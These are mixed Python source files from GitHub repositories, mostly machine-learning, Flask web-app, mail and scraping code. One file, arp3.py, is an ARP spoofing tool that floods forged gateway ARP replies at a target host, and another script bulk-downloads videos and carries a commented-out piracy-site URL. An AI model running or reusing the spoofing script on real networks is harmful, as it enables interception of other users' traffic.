kernel=linear_kernel,\n epsilon=None,\n device=torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\"),\n ):\n self.x_scaler = x_scaler\n self.y_scaler = y_scaler\n self.kernel = kernel\n self.epsilon = epsilon\n self.device = device\n\n def _to_tensor(self, array, dtype=torch.float64):\n return torch.as_tensor(array, dtype=dtype).to(self.device)\n\n def _setfit(self, X, y):\n self.y = self._to_tensor(\n self.y_scaler.fit_transform(y.reshape(-1, 1)).reshape(\n -1,\n )\n )\n self.X = self._to_tensor(self.x_scaler.fit_transform(X))\n if self.epsilon is None:\n xyt = self.X.T\n # default epsilon is the \"the average distance between nodes\" based on a bounding hypercube\n ximax = torch.amax(xyt, axis=1)\n ximin = torch.amin(xyt, axis=1)\n edges = ximax - ximin\n edges = edges[torch.nonzero(edges)]\n self.epsilon = torch.pow(\n torch.prod(edges) / xyt.shape[-1], 1.0 / edges.size(0)\n )\n\n def fit(self, X, y):\n self._setfit(X=X, y=y)\n # Kernel distances between observations\n self.internal_dist = self.kernel(self.X, self.X, epsilon=self.epsilon)\n # Solve for weights such that distance at the observations is minimized\n self.weights = torch.linalg.solve(self.internal_dist, self.y)\n\n def predict(self, X):\n # Kernel distances between inputs and grid\n dist = self.kernel(\n self.X,\n self._to_tensor(self.x_scaler.transform(X), dtype=self.X.dtype),\n epsilon=self.epsilon,\n )\n # Matrix multiply the weights for each interpolated point by the distances\n zi = torch.matmul(self.weights, dist).cpu().numpy()\n # Cast back to original space\n zi = self.y_scaler.inverse_transform(zi.reshape(-1, 1)).reshape(\n -1,\n )\n return zi\n","repo_name":"stanbiryukov/Nyx","sub_path":"nyx/torch/interpolate.py","file_name":"interpolate.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"} +{"seq_id":"18533379438","text":"# encoding: utf-8\n\nfrom marrow.mailer.exc import TransportExhaustedException\n\n\n__all__ = ['ImmediateManager']\n\nlog = __import__('logging').getLogger(__name__)\n\n\n\nclass ImmediateManager(object):\n def __init__(self, config, Transport):\n self._Transport = Transport\n self._transport = None\n \n super(ImmediateManager, self).__init__()\n \n @property\n def transport(self):\n if not self._transport:\n self._transport = self._Transport()\n self._transport.startup()\n \n return self._transport\n \n def startup(self):\n log.info(\"Immediate delivery manager starting.\")\n \n self.transport # This will trigger startup automatically.\n \n log.info(\"Immediate delivery manager started.\")\n \n def deliver(self, message):\n try:\n result = self.transport.deliver(message)\n \n except TransportExhaustedException:\n log.debug(\"Transport exhausted, retrying.\")\n self.transport.shutdown()\n self.deliver(message)\n \n return message, result\n \n def shutdown(self):\n log.info(\"Immediate delivery manager stopping.\")\n \n self.transport.shutdown()\n \n log.info(\"Immediate delivery manager stopped.\")\n","repo_name":"mcdonc/marrow.mailer","sub_path":"marrow/mailer/manager/immediate.py","file_name":"immediate.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"9908868310","text":"# Import module and packages\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom utils.variables import *\n\n\n# Standard CNN ResNet block architecture\nclass ResBlock(nn.Module):\n \"\"\"\n A class for a standard Residual Network block\n\n Structure:\n - conv1: the first 2D convolutional layer\n - bn1: 2D batch normalization\n - conv2: the second 2D convolutional layer\n - bn2: 2D batch normalization\n\n Method:\n - __init__: initialize a class with n_channels (in_channels and out_channels)\n - forward: perform forward propagation through the residual block and return output\n \"\"\"\n\n def __init__(self, n_channels):\n super(ResBlock, self).__init__()\n # Conv1 3x3 stride 1 pad 1 in_channel = out_channel\n self.conv1 = nn.Conv2d(in_channels=n_channels, out_channels=n_channels, kernel_size=3, stride=1, padding=1,\n bias=True)\n self.bn1 = nn.BatchNorm2d(n_channels)\n # Conv2 3x3 stride 1 pad 1 in_channel = out_channel\n self.conv2 = nn.Conv2d(in_channels=n_channels, out_channels=n_channels, kernel_size=3, stride=1, padding=1,\n bias=True)\n self.bn2 = nn.BatchNorm2d(n_channels)\n\n def forward(self, x):\n # Perform feed forward propagation through the residual block\n # x -> Conv1 -> bn1 -> ReLU -> Conv2 -> bn2 -> ReLU (with shortcut)\n shortcut = x\n x = F.leaky_relu(self.bn1(self.conv1(x)))\n x = F.leaky_relu(self.bn2(self.conv2(x)) + shortcut)\n return x\n","repo_name":"ChayutWo/license-plate-recogition","sub_path":"models/resblock.py","file_name":"resblock.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30685933179","text":"from datetime import datetime\nfrom uuid import UUID\n\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlmodel import select\nfrom sqlmodel.ext.asyncio.session import AsyncSession\n\nfrom conchalabs.user_audios.errors import UserAudioConflictError, UserAudioNotFoundError\nfrom conchalabs.user_audios.models import UserAudio\nfrom conchalabs.user_audios.repositories.base import UserAudioRepository\n\n\nclass PostgresUserAudioRepository(UserAudioRepository):\n def __init__(self, session: AsyncSession):\n self._session = session\n\n async def save(self, user_audio: UserAudio) -> UserAudio:\n user_audio.updated_at = datetime.utcnow()\n\n self._session.add(user_audio)\n\n try:\n await self._session.commit()\n except IntegrityError as error:\n raise UserAudioConflictError() from error\n\n await self._session.refresh(user_audio)\n\n return user_audio\n\n async def find(self, filters: dict) -> list[UserAudio]:\n query = select(UserAudio)\n\n for field, val in filters.items():\n query = query.where(getattr(UserAudio, field) == val)\n\n user_audios = await self._session.execute(query)\n return user_audios.scalars().all()\n\n async def get_by_id(self, user_id: UUID, audio_id: UUID) -> UserAudio:\n query = select(UserAudio).where(\n (UserAudio.id == audio_id) & (UserAudio.user_id == user_id)\n )\n\n result = await self._session.execute(query)\n audio = result.scalars().first()\n\n if audio is None:\n raise UserAudioNotFoundError()\n\n return audio\n","repo_name":"lucascb/conchalabs-api","sub_path":"conchalabs/user_audios/repositories/postgres.py","file_name":"postgres.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28947569181","text":"import numpy as np\n\nimport torch\nimport os\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.datasets as dset\nfrom torch.utils.data.sampler import SubsetRandomSampler\n\nfrom torchvision import transforms\n\nclass PyTorchHelper:\n\n def __init__(self, batch_size, data):\n self.output = 'output'\n self.batch_size = batch_size\n self.data = data\n self.device = torch.device(\"cuda:0\") # Let's make sure GPU is available!\n\n def split(self, validation_split):\n\n data_size = self.data.data.shape[0]\n split = int(np.floor(validation_split * data_size))\n indices = list(range(data_size))\n np.random.shuffle(indices)\n\n train_indices, val_indices = indices[split:], indices[:split]\n\n return train_indices, val_indices\n\n def load_model(self, model_name, model):\n\n checkpoint = torch.load(self.output + '/' + model_name)\n model.load_state_dict(checkpoint['model_state_dict'])\n\n loss_history = checkpoint['loss_history']\n train_history = checkpoint['train_history']\n val_history = checkpoint['val_history']\n\n for i in range(len(val_history)):\n print(\"Average loss: %f, Train accuracy: %f, Val accuracy: %f\" % (loss_history[i], train_history[i], val_history[i]))\n\n return loss_history, train_history, val_history\n\n def save_model(self, model_name, model, loss_history, train_history, val_history):\n\n if not os.path.exists(self.output):\n os.makedirs(self.output)\n\n torch.save({\n 'model_state_dict': model.state_dict(),\n 'loss_history': loss_history,\n 'train_history' : train_history,\n 'val_history': val_history\n }, self.output + '/' + model_name)\n\n return 0\n\n def train_model(self, model_name, model, train_loader, val_loader, loss, optimizer, num_epochs, scheduler=None):\n\n if os.path.isfile(self.output + '/' + model_name):\n return self.load_model(model_name, model)\n\n loss_history = []\n train_history = []\n val_history = []\n for epoch in range(num_epochs):\n model.train() # Enter train mode\n\n loss_accum = 0\n correct_samples = 0\n total_samples = 0\n for i_step, (x, y) in enumerate(train_loader):\n x_gpu = x.to(self.device)\n y_gpu = y.to(self.device)\n prediction = model(x_gpu)\n loss_value = loss(prediction, y_gpu)\n optimizer.zero_grad()\n loss_value.backward()\n optimizer.step()\n\n _, indices = torch.max(prediction, 1)\n correct_samples += torch.sum(indices == y_gpu)\n total_samples += y.shape[0]\n\n loss_accum += loss_value\n\n if scheduler is not None:\n scheduler.step()\n\n ave_loss = loss_accum / i_step\n train_accuracy = float(correct_samples) / total_samples\n val_accuracy = self.compute_accuracy(model, val_loader)\n\n loss_history.append(float(ave_loss))\n train_history.append(train_accuracy)\n val_history.append(val_accuracy)\n\n print(\"Average loss: %f, Train accuracy: %f, Val accuracy: %f\" % (ave_loss, train_accuracy, val_accuracy))\n\n self.save_model(model_name, model, loss_history, train_history, val_history)\n return loss_history, train_history, val_history\n\n def compute_accuracy(self, model, loader):\n \"\"\"\n Computes accuracy on the dataset wrapped in a loader\n\n Returns: accuracy as a float value between 0 and 1\n \"\"\"\n model.eval() # Evaluation mode\n # TODO: Copy implementation from previous assignment\n # Don't forget to move the data to device before running it through the model!\n\n total_samples = 0\n correct_samples = 0\n for i_step, (x, y) in enumerate(loader):\n x_gpu = x.to(self.device)\n y_gpu = y.to(self.device)\n\n prediction = model(x_gpu)\n\n _, indices = torch.max(prediction, 1)\n\n total_samples += y.shape[0]\n correct_samples += torch.sum(indices == y_gpu)\n\n return float(correct_samples) / total_samples\n","repo_name":"Chularev/courses","sub_path":"dl_on_fingers/assignments/assignment3/pytorch_helper.py","file_name":"pytorch_helper.py","file_ext":"py","file_size_in_byte":4285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70928194603","text":"from flask import Flask, render_template, request, redirect, url_for, flash, jsonify\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom database_setup import Base, Cruise\n\napp = Flask(__name__)\n\nengine = create_engine('sqlite:///curise.db')\nBase.metadata.bind = engine\n\nDBSession = sessionmaker(bind=engine)\nsession = DBSession()\n\n@app.route('/')\ndef index():\n curises = session.query(Cruise).order_by(Cruise.date)\n return render_template('index.html', curises = curises)\n\n@app.route('/cheap')\ndef cheap():\n curises = session.query(Cruise).order_by(Cruise.price)\n return render_template('index.html', curises = curises) \n\nif __name__ == '__main__':\n app.secret_key = 'super_secret_key'\n app.debug = True\n app.run(host='0.0.0.0', port=5000)","repo_name":"carchi8py/Vacation-Scraper","sub_path":"vacation/webpage.py","file_name":"webpage.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32007877190","text":"#!/bin/python3\nimport requests\nimport sys\nfrom urllib.parse import unquote\nfrom bs4 import BeautifulSoup as bs\n\n# URI = \"https://cloud.piracy.wiki/KnightLiteKing/[AnimeKuro] Family Guy [x265 10-bit HEVC] [KLK]/[AnimeKuro] Family Guy Season 15 [480p] [KLK]\"\n\nURI = 'https://pauladaunt.com/books/'\n\n\"\"\"\n Signature: \n String -> String\n Purpose:\n Take a String URL and Sends an HTTP Request to that URL and parse the returned html\n and return a string representation of that html page\n\"\"\"\n\ndef grab_html(url):\n res = requests.get(url)\n return res.text\n\ndef download_file(url, content):\n parsed_html = bs(content, features=\"lxml\")\n anchor_tags = parsed_html.body.findAll(\"a\")\n\n for a in anchor_tags:\n if(a.attrs['href'].endswith('.mp4')):\n print(\"downloading {0}\".format(a.attrs['href']))\n req = requests.get(url + \"/\" + a.attrs['href'])\n f = open(a.attrs['href'], 'wb')\n f.write(req.content)\n f.close()\n else:\n print(\"Skipping {0} ...\".format(a.attrs['href']))\n\n\ndef main():\n try:\n if(len(sys.argv) != 2):\n print(\"Usage: {0} \".format(sys.argv[0]))\n exit(-1)\n\n url = unquote(sys.argv[1])\n # grabing html\n print(\"Scanning the Html Page ...\")\n content = grab_html(url)\n\n # downloading the files\n print(\"Starting to Download the files ...\")\n download_file(url, content)\n except Exception:\n print(\"error occured\")\n except KeyboardInterrupt:\n print(\"Bye Bye ya Monsef\")\n\nmain()","repo_name":"ahmedmagdy492/Download-All-Files-Script","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16487699000","text":"# coding=utf-8\nfrom json import dumps\nfrom plone.memoize.view import memoize_contextless\nfrom Products.Five.browser import BrowserView\nfrom zope.i18nmessageid import MessageFactory\n\n\npl_message = MessageFactory('plonelocales')\npae_message = MessageFactory('plone.app.event')\n\n\nclass I18nJSONView(BrowserView):\n '''\n I am the date-picker-i18n.json view class\n\n Use me like this:\n \n '''\n\n @memoize_contextless\n def __call__(self):\n translate = self.context.translate\n json = dumps({\n \"previousMonth\": translate(pae_message(\"prev_month_link\")),\n \"nextMonth\": translate(pae_message(\"next_month_link\")),\n \"months\": [\n translate(pl_message(month)) for month in [\n \"month_jan\",\n \"month_feb\",\n \"month_mar\",\n \"month_apr\",\n \"month_may\",\n \"month_jun\",\n \"month_jul\",\n \"month_aug\",\n \"month_sep\",\n \"month_oct\",\n \"month_nov\",\n \"month_dec\",\n ]\n ],\n \"weekdays\": [\n translate(pl_message(weekday)) for weekday in [\n \"weekday_sun\",\n \"weekday_mon\",\n \"weekday_tue\",\n \"weekday_wed\",\n \"weekday_thu\",\n \"weekday_fri\",\n \"weekday_sat\",\n ]\n ],\n \"weekdaysShort\": [\n translate(pl_message(weekday_abbr)) for weekday_abbr in [\n \"weekday_sun_abbr\",\n \"weekday_mon_abbr\",\n \"weekday_tue_abbr\",\n \"weekday_wed_abbr\",\n \"weekday_thu_abbr\",\n \"weekday_fri_abbr\",\n \"weekday_sat_abbr\",\n ]\n ],\n })\n return json\n","repo_name":"ploneintranet/ploneintranet","sub_path":"src/ploneintranet/layout/browser/date_picker.py","file_name":"date_picker.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"19"} +{"seq_id":"21569638847","text":"class Solution:\n def networkDelayTime(self, times: List[List[int]], n: int, k: int) -> int:\n graph = defaultdict(list)\n distances = {node: float('inf') for node in range(1, n+1)}\n distances[k] = 0\n visited = set()\n\n for u, v, w in times:\n graph[u].append((v, w))\n \n while len(visited) != n:\n # Find the node with the smallest distance\n min_node = None\n min_distance = float('inf')\n for node in distances:\n if distances[node] < min_distance and node not in visited:\n min_node = node\n min_distance = distances[node]\n \n if not min_node:\n break\n # Mark it as visited\n visited.add(min_node)\n\n # Update the the distances of neighbor nodes\n for neighbor, times in graph[min_node]:\n distances[neighbor] = min(distances[neighbor], (distances[min_node] + times))\n\n return max(distances.values()) if len(visited) == n else -1","repo_name":"wctseng99/leetcode-record","sub_path":"0744-network-delay-time/0744-network-delay-time.py","file_name":"0744-network-delay-time.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42027002769","text":"# coding:utf-8\nimport argparse\nfrom scapy.all import *\nimport threading\n\nparser = argparse.ArgumentParser()\nthreads = []\n\n\ndef send_pack(arp):\n sendp(arp, iface='eth0')\n\n\ndef main():\n parser.add_argument('-gateway', action='store', dest='gateway_ip', type=str, help=u'请输入网关ip地址')\n parser.add_argument('-targetm', action='store', dest='target_mac', type=str, help=u'请输入目标主机mac地址')\n parser.add_argument('-targeti', action='store', dest='target_ip', type=str, help=u'请输入目标主机ip地址')\n arg = parser.parse_args()\n source_mac = get_if_hwaddr('eth0')\n arp = Ether(src=source_mac, dst=arg.target_mac) / ARP(hwsrc=source_mac, psrc=arg.gateway_ip, hwdst=arg.target_mac,\n pdst=arg.target_ip, op=2)\n\n while (1):\n t = threading.Thread(target=send_pack, args=arp)\n t.start()\n threads.append(t)\n for i in threads:\n t.join()\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"merlinxcy/python","sub_path":"scapy/arp3.py","file_name":"arp3.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26080890066","text":"from common import read_data, display_result\n\n\ndef find_n_first_uniques(n_uniques, data):\n index = -1\n upper_search_limit = len(data) - n_uniques + 1\n for i in range(0, upper_search_limit):\n potential_packet = data[i:i + n_uniques]\n uniques_in_packet = set(potential_packet)\n if len(uniques_in_packet) == n_uniques:\n index = i + n_uniques\n break\n\n return index\n\n\ndef run():\n data = read_data(1, test=False)\n\n # ----------- PART 1 ----------- #\n index_packet = find_n_first_uniques(4, data)\n display_result(1, index_packet)\n\n # ----------- PART 2 ----------- #\n index_message = find_n_first_uniques(14, data)\n display_result(2, index_message)\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"OlofSjogren/AdventOfCode","sub_path":"2022/day_6/day_6.py","file_name":"day_6.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20206866097","text":"from collections import Counter, defaultdict\nfrom typing import List, DefaultDict\n\nDATA = \"\"\"abc\n\na\nb\nc\n\nab\nac\n\na\na\na\na\n\nb\"\"\"\n\n\nAnswers = DefaultDict[str, str]\n\n\ndef get_answer(raw: str) -> Answers:\n answer = defaultdict(lambda: \"no\")\n for char in set(raw.replace(\"\\n\", \"\")):\n answer[char] = \"yes\"\n return answer\n\n\ndef get_answer2(raw: str) -> Answers:\n answer = defaultdict(lambda: \"no\")\n num_people = len(raw.split(\"\\n\"))\n for char in set(raw.replace(\"\\n\", \"\")):\n if raw.count(char) == num_people:\n answer[char] = \"yes\"\n return answer\n\n\ndef count_answers(answers: List[Answers]) -> int:\n values = []\n for ans in answers:\n values.extend(list(ans.values()))\n counter = Counter(values)\n return counter[\"yes\"]\n\n\nanswers = [get_answer(raw) for raw in DATA.split(\"\\n\\n\")]\nassert count_answers(answers) == 11\n\nanswers2 = [get_answer2(raw) for raw in DATA.split(\"\\n\\n\")]\nassert count_answers(answers2) == 6\n\n\nwith open(\"data/day06.txt\") as f:\n data = f.read()\n answers = [get_answer(raw) for raw in data.split(\"\\n\\n\")]\n print(count_answers(answers))\n\n answers2 = [get_answer2(raw) for raw in data.split(\"\\n\\n\")]\n print(count_answers(answers2))\n","repo_name":"fursovia/adventofcode2020","sub_path":"day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16886642230","text":"import os\nimport shutil\nimport pandas as pd\nimport csv\nfrom pytimedinput import timedInput\nimport sys\nimport subprocess\nfrom datetime import datetime\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nNaveUsed = eval(os.getenv('NaveUsed'))\nNavePicoIP = os.getenv('NavePicoIP')\nNaveClientPicoIP = os.getenv('NaveClientPicoIP')\nChancelUsed = eval(os.getenv('ChancelUsed'))\nChancelPicoIP = os.getenv('ChancelPicoIP')\nChancelClientPicoIP = os.getenv('ChancelClientPicoIP')\n\nPicourl = pd.Series( [NavePicoIP, NaveClientPicoIP, ChancelPicoIP, ChancelClientPicoIP], \\\n index=['Nave', 'NaveClient', 'Chancel', 'ChancelClient'])\n\nLINE_UP = '\\033[1A'\nLINE_CLEAR = '\\x1b[2K'\nBOLD = '\\033[1m'\nGhostFile = \"/home/pi/shared/Ghost.csv\"\n\ndef SaveFile(df,FileName):\n with open(GhostFile, 'w') as csv_file:\n df.to_csv(path_or_buf=csv_file, index = False)\n shutil.copyfile(GhostFile,FileName)\n\ndef GetFile(filename):\n return pd.read_csv(filename)\n\ndef my_int(text,mx):\n try: y = int(text)\n except: y = mx+1\n return(y)\n\ndef MyInput(text,ml):\n userText, timedOut = timedInput(text, timeout=120, maxLength = ml)\n if timedOut:\n sys.exit()\n return userText \n \ndef LineUpandClear(i):\n for j in range(i):\n print(LINE_UP, BOLD, end=LINE_CLEAR)\n\ndef GetNumber(flag,text,mn,mx):\n y = -1\n while y > mx or y < mn:\n if flag:\n y = my_int(MyInput(text,6),mx)\n else:\n y = my_int(input(text),mx)\n if y > mx or y < mn:\n LineUpandClear(1)\n return y\n","repo_name":"agt361/HeatingServer","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38645928401","text":"from app import app\nfrom flask import render_template, request, redirect, session\nfrom flask_login import login_user, current_user, login_required, login_manager, logout_user\nfrom os.path import splitext, join \nfrom werkzeug.exceptions import NotFound\n\n\nfrom app.db import query\nfrom app.models.podcast import getAllEpisodesInPodcast, getAllPodcasts\nimport app.models.user as user\nimport app.models.episode as episode\nimport app.models.podcast as podcast\nimport app.models.comment as comment\nfrom app.common import savefile, timestampToString, rake_extractor as getKeywords\n\nlogin_manager.login_view = \"/login\"\n\n# Basic endpoints knowledge:\n# /* usually accepts a GET request and displays a page\n# /api/* usually accepts a POST request and redirect to other pages, or at most displays an error\n# /p/* is the user profile endpoint\n# /pod/* is the podcast endpoint\n# /pod/*/* is the episode endpoint\n\n@app.errorhandler(NotFound)\ndef notfound_handler(e=NotFound):\n return render_template(\"404.html\"), 404\n\n@app.route('/signup')\ndef signup():\n return render_template(\"signup.html\")\n\n@app.route('/api/signup', methods=[\"POST\"])\ndef api_signup():\n usr = user.User(\n username=request.form[\"username\"],\n password=request.form[\"password\"],\n is_creator=True if request.form[\"is_creator\"] == 'on' else False,\n display_name=request.form[\"display_name\"]\n )\n if(usr.username == '' or usr.password == '' or usr.display_name == ''):\n return redirect(session[\"history\"].get(-1) + \"?err=1000\")\n res = user.createUserIfAvailable(usr)\n if(res == user.USER_CREATED):\n return redirect(\"/login\")\n elif (res == user.USERNAME_NOT_AVAILABLE):\n return redirect(\"/signup?err=1001\")\n\n@app.route('/login')\ndef login():\n return render_template(\"login.html\")\n\n@app.route('/api/login', methods=[\"POST\"])\ndef api_login():\n username = request.form.get(\"username\")\n password = request.form.get(\"password\")\n res = user.verifyCredentials(username, password)\n if username == '' or res == user.INVALID_USERNAME:\n return redirect(session[\"history\"].get(0) + \"?err=1002\")\n elif password== '' or res == user.PASSWORD_MISMATCH:\n return redirect(session[\"history\"].get(0) + \"?err=1003\")\n \n usr = user.getUserByUsername(username)\n login_user(usr, True)\n return redirect(\"/\")\n\n@app.route(\"/api/signout\")\ndef signout():\n logout_user()\n session['last_played']['ep'] = None\n session['last_played']['pod'] = None\n session['last_played']['meta'] = {\n 'is_playing': False,\n 'current_time': 0,\n 'tickid': 0\n }\n return redirect(\"/\")\n\n@app.route(\"/\")\ndef home():\n data = dict()\n\n sql = \"SELECT * FROM episode ORDER BY release_date DESC\"\n all_episodes = [episode.rowToObject(r) for r in query(sql)]\n data[\"episode\"] = dict()\n for e in all_episodes: data[\"episode\"][(e.podcast_podcastid, e.episodeid)] = e\n data[\"latest\"] = [(e.podcast_podcastid, e.episodeid) for e in all_episodes[0:10]]\n\n sql = \"SELECT * FROM podcast\"\n all_podcasts = [podcast.rowToObject(r) for r in query(sql)]\n data[\"podcast\"] = dict()\n for p in all_podcasts:\n data[\"podcast\"][p.podcastid] = p\n data[\"similar\"] = []\n data[\"user\"] = dict()\n for p in data[\"podcast\"]:\n data[\"user\"][data[\"podcast\"][p].user_username] = user.getUserByUsername(data[\"podcast\"][p].user_username)\n if(current_user.is_authenticated):\n # Get all categories of all podcasts followed\n categories = [podcast.getPodcastById(p).category for p in user.getUserByUsername(current_user.username).getFollowingPodcasts()]\n # flatten list\n categories = [c for elem in categories for c in elem]\n # Get all episodes of all podcasts with some of those categories\n similar = [pod.getAllEpisodes() for pod in list(filter(lambda p : any(chk in p.category for chk in categories), podcast.getAllPodcasts()))]\n # flatten list\n similar = [e for p in similar for e in p]\n data[\"similar\"] = [(e.podcast_podcastid, e.episodeid) for e in similar]\n return render_template(\"home.html\", data=data)\n\n@app.route(\"/subscriptions\")\n@login_required\ndef subscriptions():\n usr = user.getUserByUsername(current_user.username)\n following = [podcast.getPodcastById(f) for f in usr.getFollowingPodcasts()]\n data = list()\n for f in following:\n data.append({\n 'podcast_meta': f,\n 'episodes_data': f.getAllEpisodes()\n })\n return render_template(\"subscriptions.html\", data=data)\n\n@app.route(\"/categories\")\ndef categories():\n categories = [i[\"name\"] for i in query(\"SELECT name FROM category\", ())]\n data = list()\n for c in categories:\n episodes = list(filter(lambda e : c in podcast.getPodcastById(e.podcast_podcastid).category, episode.getAllEpisodes()))\n data.append({\n 'category': c,\n 'episodes': [{\n 'episode_meta': e,\n 'podcast_meta': podcast.getPodcastById(e.podcast_podcastid)\n } for e in episodes]\n })\n return render_template(\"categories.html\", data=data)\n\n@app.route(\"/me\")\n@login_required\ndef me():\n usr = user.getUserByUsername(current_user.username)\n following = [podcast.getPodcastById(str(p)) for p in usr.getFollowingPodcasts()]\n created = podcast.getPodcastByUsername(usr.username)\n return render_template(\"profile.html\", user=current_user, following=following, getUserByUsername=user.getUserByUsername, created=created)\n\n@app.route('/p/', defaults={'username': ''})\n@app.route(\"/p/\", methods=[\"GET\"])\ndef profile(username):\n usr = user.getUserByUsername(username)\n following = [podcast.getPodcastById(str(p)) for p in usr.getFollowingPodcasts()]\n created = podcast.getPodcastByUsername(usr.username)\n return render_template(\"profile.html\", user=usr, following=following, getUserByUsername=user.getUserByUsername, created=created)\n\n@app.route(\"/new\")\n@login_required\ndef new():\n if not current_user.is_creator:\n return redirect(\"/\")\n created = [podcast.rowToObject(q) for q in query(\"SELECT * FROM podcast WHERE user_username = ?\", (current_user.username,))]\n categories = podcast.getAllCategories()\n return render_template(\"new.html\", created=created, categories=categories)\n\n@app.route(\"/api/new/podcast\", methods=[\"POST\"])\n@login_required\ndef newpodcast():\n if not current_user.is_creator:\n return 404.\n if(request.form[\"newpodcast_description\"] == None or request.form[\"newpodcast_title\"] == None):\n return redirect(session[\"history\"].get(-1) + \"?err=1004\")\n \n categories = list(filter(lambda k : \"cat-\" in k , request.form.keys()))\n if(len(categories) == 0):\n return \"Select a category\", 500\n\n if \"image\" in request.files[\"newpodcast_thumbnail\"].mimetype:\n f = request.files[\"newpodcast_thumbnail\"]\n filename = str(abs(hash(f.filename))) + splitext(f.filename)[-1]\n savefile(f, join(\"images\", filename))\n else:\n filename = \"pod_default.jpg\"\n\n \n p = podcast.createNew(request.form[\"newpodcast_description\"], request.form[\"newpodcast_title\"], filename, current_user.username, categories)\n if(p == podcast.ERR_COULD_NOT_CREATE):\n return redirect(session[\"history\"].get(-1) + \"?err=1005\")\n return redirect(f\"/pod/{p.podcastid}\")\n\n@app.route('/pod/', defaults={'podcastid': ''})\n@app.route(\"/pod/\", methods=[\"GET\"])\ndef podcastview(podcastid):\n pod = podcast.getPodcastById(podcastid)\n if(pod == None):\n return notfound_handler()\n ep = pod.getAllEpisodes()\n creator = user.getUserByUsername(pod.user_username)\n is_following = current_user.is_authenticated and query(\"SELECT * FROM following WHERE podcast_podcastid = ? AND user_username = ?\", (pod.podcastid, current_user.username,)) != []\n return render_template(\"podcast.html\", pod=pod, ep=ep, creator=creator, is_following=is_following, timestampToString=timestampToString, getKeywords=getKeywords)\n\n@app.route('/api/follow/', defaults={'podcastid': ''})\n@app.route('/api/follow/', methods=[\"POST\"])\n@login_required\ndef follow(podcastid):\n if int(podcastid) in user.getUserByUsername(current_user.username).getFollowingPodcasts():\n query(\"DELETE FROM following WHERE user_username = ? AND podcast_podcastid = ?\", (current_user.username, podcastid,))\n else: \n query(\"INSERT INTO following VALUES(?, ?)\", (current_user.username, podcastid,))\n return redirect(session[\"history\"].get(0))\n\n@app.route(\"/api/new/episode\", methods=[\"POST\"])\n@login_required\ndef newepisode():\n if not current_user.is_creator:\n return \"Not authorised.\", 401.\n if(request.form[\"newepisode_description\"] == None or request.form[\"newepisode_title\"] == None or request.form[\"newepisode_podcastid\"] == None or request.files[\"newepisode_track\"].content_length > 0):\n return redirect(\"/pod/\" + request.form[\"newepisode_podcastid\"] + \"?err=1004\")\n if(podcast.getPodcastById(request.form[\"newepisode_podcastid\"]).user_username != current_user.username):\n return redirect(\"/pod/\" + request.form[\"newepisode_podcastid\"] + \"?err=1006\")\n \n f = request.files[\"newepisode_track\"]\n if(\"audio\" not in f.mimetype):\n return \"ERROR: Data mismatch\", 500\n ext = splitext(f.filename)[-1]\n e = episode.createNew(request.form[\"newepisode_podcastid\"], request.form[\"newepisode_title\"], request.form[\"newepisode_description\"], ext)\n savefile(f, join(\"audio\", e.track)) \n if(e == episode.ERR_COULD_NOT_CREATE):\n return redirect(\"/pod/\" + request.form[\"newepisode_podcastid\"] + \"?err=1005\")\n return redirect(f\"/pod/{e.podcast_podcastid}/{e.episodeid}\")\n\n\n@app.route('/pod//', defaults={'podcastid': '', 'episodeid': ''})\n@app.route(\"/pod//\", methods=[\"GET\"])\ndef episodeview(podcastid, episodeid):\n try:\n ep = list(filter(lambda e : int(e.episodeid) == int(episodeid), episode.getEpisodeByPodcastid(podcastid)))[0]\n except:\n return notfound_handler()\n comm = ep.getComments()\n pod = podcast.getPodcastById(ep.podcast_podcastid)\n comments = list()\n for c in comm:\n comments.append({\n 'comment_data': c,\n 'user_data': user.getUserByUsername(c.user_username)\n })\n is_following = current_user.is_authenticated and len(list(filter(lambda f : f == pod.podcastid, user.getUserByUsername(current_user.username).getFollowingPodcasts()))) > 0\n return render_template(\"episode.html\", ep=ep, comments=comments, pod=pod, is_following=is_following, timestampToString=timestampToString)\n\n@app.route('/api/new/comment', methods=[\"POST\"])\n@login_required\ndef newcomment():\n content = request.form[\"content\"]\n username = current_user.username\n podcastid = request.form[\"podcastid\"]\n episodeid = request.form[\"episodeid\"]\n if(content == None or podcastid == None or episodeid == None):\n return redirect(session['history'].get(0) + '?err=1004')\n 